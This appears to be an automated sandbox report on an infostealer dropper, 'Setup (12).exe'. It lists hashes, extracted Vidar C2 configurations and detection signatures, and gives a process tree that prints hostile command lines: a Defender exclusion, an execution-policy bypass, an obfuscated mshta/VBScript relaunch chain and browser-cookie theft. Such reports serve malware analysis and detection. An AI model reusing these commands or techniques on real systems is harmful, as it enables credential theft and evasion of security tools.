Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    911s
  • max time network
    1777s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    23-08-2021 15:20

General

  • Target

    Setup (12).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

vidar

Version

40.1

Botnet

973

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    973

Extracted

Family

vidar

Version

40.1

Botnet

995

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    995

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 16 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • Blocklisted process makes network request 61 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 15 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 42 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 25 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 31 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 46 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:684
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1244
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2328
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2640
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2656
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
            • Suspicious use of SetThreadContext
            PID:2556
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k SystemNetworkService
              2⤵
              • Drops file in System32 directory
              • Checks processor information in registry
              • Modifies data under HKEY_USERS
              • Modifies registry class
              PID:580
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2336
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1788
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1368
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1188
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1080
                    • C:\Users\Admin\AppData\Local\Temp\Setup (12).exe
                      "C:\Users\Admin\AppData\Local\Temp\Setup (12).exe"
                      1⤵
                      • Checks computer location settings
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:3680
                      • C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                        "C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1416
                        • C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          3⤵
                          • Executes dropped EXE
                          PID:4472
                        • C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          3⤵
                          • Executes dropped EXE
                          PID:5004
                        • C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          3⤵
                          • Executes dropped EXE
                          PID:4364
                        • C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          3⤵
                          • Executes dropped EXE
                          PID:4948
                        • C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          C:\Users\Admin\Documents\8DrREam1QAdnHasUl15E0wKp.exe
                          3⤵
                          • Executes dropped EXE
                          PID:4436
                      • C:\Users\Admin\Documents\pojwVsNMMm6Qtv1OTpMXVm3P.exe
                        "C:\Users\Admin\Documents\pojwVsNMMm6Qtv1OTpMXVm3P.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2132
                        • C:\Users\Admin\Documents\pojwVsNMMm6Qtv1OTpMXVm3P.exe
                          C:\Users\Admin\Documents\pojwVsNMMm6Qtv1OTpMXVm3P.exe
                          3⤵
                          • Executes dropped EXE
                          PID:4492
                        • C:\Users\Admin\Documents\pojwVsNMMm6Qtv1OTpMXVm3P.exe
                          C:\Users\Admin\Documents\pojwVsNMMm6Qtv1OTpMXVm3P.exe
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:4936
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1156
                            4⤵
                            • Program crash
                            PID:3300
                      • C:\Users\Admin\Documents\DxFGyrXLTXWZYcYPhYDReAa2.exe
                        "C:\Users\Admin\Documents\DxFGyrXLTXWZYcYPhYDReAa2.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2012
                        • C:\Users\Admin\Documents\DxFGyrXLTXWZYcYPhYDReAa2.exe
                          "C:\Users\Admin\Documents\DxFGyrXLTXWZYcYPhYDReAa2.exe"
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          PID:3976
                      • C:\Users\Admin\Documents\gzA_uJwkv2VGUityygyYrKTe.exe
                        "C:\Users\Admin\Documents\gzA_uJwkv2VGUityygyYrKTe.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:1884
                        • C:\Windows\SysWOW64\rundll32.exe
                          C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\GZA_UJ~1.DLL,s C:\Users\Admin\DOCUME~1\GZA_UJ~1.EXE
                          3⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          PID:7308
                          • C:\Windows\SysWOW64\RUNDLL32.EXE
                            C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GZA_UJ~1.DLL,PjMLTVFU
                            4⤵
                            • Blocklisted process makes network request
                            • Checks processor information in registry
                            • Modifies system certificate store
                            PID:5112
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\GZA_UJ~1.DLL
                              5⤵
                                PID:9084
                              • C:\Windows\SysWOW64\RUNDLL32.EXE
                                C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GZA_UJ~1.DLL,b04gU0M3
                                5⤵
                                • Suspicious use of SetThreadContext
                                • Checks processor information in registry
                                PID:7036
                                • C:\Windows\system32\rundll32.exe
                                  C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                  6⤵
                                  • Modifies Internet Explorer settings
                                  PID:7348
                                  • C:\Windows\system32\ctfmon.exe
                                    ctfmon.exe
                                    7⤵
                                      PID:7188
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpF659.tmp.ps1"
                                  5⤵
                                    PID:9332
                            • C:\Users\Admin\Documents\eY9BcIbBT3gpojwKEcOWvMfY.exe
                              "C:\Users\Admin\Documents\eY9BcIbBT3gpojwKEcOWvMfY.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:200
                              • C:\Users\Admin\Documents\eY9BcIbBT3gpojwKEcOWvMfY.exe
                                "C:\Users\Admin\Documents\eY9BcIbBT3gpojwKEcOWvMfY.exe"
                                3⤵
                                  PID:6756
                              • C:\Users\Admin\Documents\em3KsuOmDoH8pW2WN1H_H2v7.exe
                                "C:\Users\Admin\Documents\em3KsuOmDoH8pW2WN1H_H2v7.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:2084
                              • C:\Users\Admin\Documents\3YWriBO98EObRC8Sg6kpeGCD.exe
                                "C:\Users\Admin\Documents\3YWriBO98EObRC8Sg6kpeGCD.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1868
                                • C:\Users\Admin\Documents\3YWriBO98EObRC8Sg6kpeGCD.exe
                                  "C:\Users\Admin\Documents\3YWriBO98EObRC8Sg6kpeGCD.exe"
                                  3⤵
                                    PID:5272
                                • C:\Users\Admin\Documents\NZG9LQkMucgqmuY8lEMoIwjY.exe
                                  "C:\Users\Admin\Documents\NZG9LQkMucgqmuY8lEMoIwjY.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2100
                                • C:\Users\Admin\Documents\CBcYTRJwAzDRpQ4CnVyXPYAD.exe
                                  "C:\Users\Admin\Documents\CBcYTRJwAzDRpQ4CnVyXPYAD.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2156
                                  • C:\Users\Admin\Documents\CBcYTRJwAzDRpQ4CnVyXPYAD.exe
                                    "C:\Users\Admin\Documents\CBcYTRJwAzDRpQ4CnVyXPYAD.exe" -q
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4080
                                • C:\Users\Admin\Documents\aNcoNbu3jtH9ZHN0yDK6ymKr.exe
                                  "C:\Users\Admin\Documents\aNcoNbu3jtH9ZHN0yDK6ymKr.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2364
                                  • C:\Users\Admin\Documents\aNcoNbu3jtH9ZHN0yDK6ymKr.exe
                                    C:\Users\Admin\Documents\aNcoNbu3jtH9ZHN0yDK6ymKr.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4152
                                  • C:\Users\Admin\Documents\aNcoNbu3jtH9ZHN0yDK6ymKr.exe
                                    C:\Users\Admin\Documents\aNcoNbu3jtH9ZHN0yDK6ymKr.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:2492
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 24
                                      4⤵
                                      • Program crash
                                      PID:1956
                                • C:\Users\Admin\Documents\EKeI4JtyI65NBmh6_xepymIp.exe
                                  "C:\Users\Admin\Documents\EKeI4JtyI65NBmh6_xepymIp.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:2612
                                • C:\Users\Admin\Documents\RzYJLeSUwN73q10OE5H5QgQw.exe
                                  "C:\Users\Admin\Documents\RzYJLeSUwN73q10OE5H5QgQw.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2348
                                  • C:\Users\Admin\Documents\RzYJLeSUwN73q10OE5H5QgQw.exe
                                    C:\Users\Admin\Documents\RzYJLeSUwN73q10OE5H5QgQw.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5116
                                • C:\Users\Admin\Documents\iHffDwVPgwqA8TGLlx1eFYWg.exe
                                  "C:\Users\Admin\Documents\iHffDwVPgwqA8TGLlx1eFYWg.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:2368
                                • C:\Users\Admin\Documents\tXx8_m0dD63C6ea1wg42bUAS.exe
                                  "C:\Users\Admin\Documents\tXx8_m0dD63C6ea1wg42bUAS.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3992
                                  • C:\Users\Admin\AppData\Roaming\7432946.exe
                                    "C:\Users\Admin\AppData\Roaming\7432946.exe"
                                    3⤵
                                      PID:5612
                                    • C:\Users\Admin\AppData\Roaming\1806055.exe
                                      "C:\Users\Admin\AppData\Roaming\1806055.exe"
                                      3⤵
                                      • Adds Run key to start application
                                      PID:5964
                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                        4⤵
                                          PID:5824
                                      • C:\Users\Admin\AppData\Roaming\4153374.exe
                                        "C:\Users\Admin\AppData\Roaming\4153374.exe"
                                        3⤵
                                          PID:5164
                                        • C:\Users\Admin\AppData\Roaming\2033407.exe
                                          "C:\Users\Admin\AppData\Roaming\2033407.exe"
                                          3⤵
                                            PID:6068
                                        • C:\Users\Admin\Documents\YV0MN78VR1_d3RTpiitiJ2WQ.exe
                                          "C:\Users\Admin\Documents\YV0MN78VR1_d3RTpiitiJ2WQ.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2680
                                          • C:\Users\Admin\Documents\YV0MN78VR1_d3RTpiitiJ2WQ.exe
                                            "C:\Users\Admin\Documents\YV0MN78VR1_d3RTpiitiJ2WQ.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:5440
                                        • C:\Users\Admin\Documents\XeVRizk0nCZxLaf9RD858eS7.exe
                                          "C:\Users\Admin\Documents\XeVRizk0nCZxLaf9RD858eS7.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2636
                                        • C:\Users\Admin\Documents\wXCA9nLpJOo3TNW5hjyNODn5.exe
                                          "C:\Users\Admin\Documents\wXCA9nLpJOo3TNW5hjyNODn5.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:348
                                          • C:\Users\Admin\Documents\wXCA9nLpJOo3TNW5hjyNODn5.exe
                                            "C:\Users\Admin\Documents\wXCA9nLpJOo3TNW5hjyNODn5.exe"
                                            3⤵
                                              PID:2392
                                          • C:\Users\Admin\Documents\1x0mIwA78fyzUqZ9NnVbXaow.exe
                                            "C:\Users\Admin\Documents\1x0mIwA78fyzUqZ9NnVbXaow.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3776
                                          • C:\Users\Admin\Documents\iQTbghqHuYAtNB8M5GJvyki0.exe
                                            "C:\Users\Admin\Documents\iQTbghqHuYAtNB8M5GJvyki0.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:208
                                          • C:\Users\Admin\Documents\knP3FwiwZcGIECv8oAgQncub.exe
                                            "C:\Users\Admin\Documents\knP3FwiwZcGIECv8oAgQncub.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:932
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 664
                                              3⤵
                                              • Program crash
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5080
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 680
                                              3⤵
                                              • Program crash
                                              PID:6040
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 716
                                              3⤵
                                              • Program crash
                                              PID:6012
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 676
                                              3⤵
                                              • Program crash
                                              PID:1732
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 1168
                                              3⤵
                                              • Program crash
                                              PID:5456
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 1124
                                              3⤵
                                              • Program crash
                                              PID:3332
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 1116
                                              3⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              PID:2380
                                          • C:\Users\Admin\Documents\h42v1RDQ5loeZSwsQjiAUJi0.exe
                                            "C:\Users\Admin\Documents\h42v1RDQ5loeZSwsQjiAUJi0.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3848
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 276
                                              3⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3404
                                          • C:\Users\Admin\Documents\PdRYxtPY2eukem2xsX9oASsb.exe
                                            "C:\Users\Admin\Documents\PdRYxtPY2eukem2xsX9oASsb.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2000
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 660
                                              3⤵
                                              • Program crash
                                              PID:3124
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 676
                                              3⤵
                                              • Program crash
                                              PID:5140
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 664
                                              3⤵
                                              • Program crash
                                              PID:6088
                                          • C:\Users\Admin\Documents\6RDx6KGejI9Y7KdFW7jDZl9o.exe
                                            "C:\Users\Admin\Documents\6RDx6KGejI9Y7KdFW7jDZl9o.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3348
                                          • C:\Users\Admin\Documents\h8ZCRjx60R6Q7zKXRhY8lpcX.exe
                                            "C:\Users\Admin\Documents\h8ZCRjx60R6Q7zKXRhY8lpcX.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3328
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\h8ZCRjx60R6Q7zKXRhY8lpcX.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\h8ZCRjx60R6Q7zKXRhY8lpcX.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                              3⤵
                                                PID:4416
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\h8ZCRjx60R6Q7zKXRhY8lpcX.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\h8ZCRjx60R6Q7zKXRhY8lpcX.exe" ) do taskkill -f -iM "%~NxA"
                                                  4⤵
                                                    PID:3628
                                                    • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                      hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                      5⤵
                                                        PID:5828
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                          6⤵
                                                            PID:2380
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                              7⤵
                                                                PID:5536
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                              6⤵
                                                              • Loads dropped DLL
                                                              PID:5696
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill -f -iM "h8ZCRjx60R6Q7zKXRhY8lpcX.exe"
                                                            5⤵
                                                            • Kills process with taskkill
                                                            PID:4856
                                                    • C:\Users\Admin\Documents\RdOzoEzI4ptV4fxMbkih3dMP.exe
                                                      "C:\Users\Admin\Documents\RdOzoEzI4ptV4fxMbkih3dMP.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:648
                                                    • C:\Users\Admin\Documents\lpzbgtei0IAa0MhBLm6YD9EJ.exe
                                                      "C:\Users\Admin\Documents\lpzbgtei0IAa0MhBLm6YD9EJ.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:3436
                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        PID:4608
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          4⤵
                                                            PID:5816
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            4⤵
                                                              PID:4220
                                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:4740
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              4⤵
                                                                PID:4388
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                4⤵
                                                                  PID:5232
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  4⤵
                                                                    PID:5052
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    4⤵
                                                                      PID:4784
                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Checks whether UAC is enabled
                                                                    • Drops file in Program Files directory
                                                                    PID:4692
                                                                • C:\Users\Admin\Documents\MlGgxL06F6yuNaaQU0ESIHcK.exe
                                                                  "C:\Users\Admin\Documents\MlGgxL06F6yuNaaQU0ESIHcK.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:1004
                                                                • C:\Users\Admin\Documents\r1FpEG0gfVhA7vcY4p0QlWrN.exe
                                                                  "C:\Users\Admin\Documents\r1FpEG0gfVhA7vcY4p0QlWrN.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:2704
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1668
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:5224
                                                                • C:\Users\Admin\Documents\MUI4VbGmUJUjK1hDYGVlIMLR.exe
                                                                  "C:\Users\Admin\Documents\MUI4VbGmUJUjK1hDYGVlIMLR.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:4324
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                1⤵
                                                                  PID:68
                                                                • C:\Users\Admin\AppData\Local\Temp\is-TC6SE.tmp\MUI4VbGmUJUjK1hDYGVlIMLR.tmp
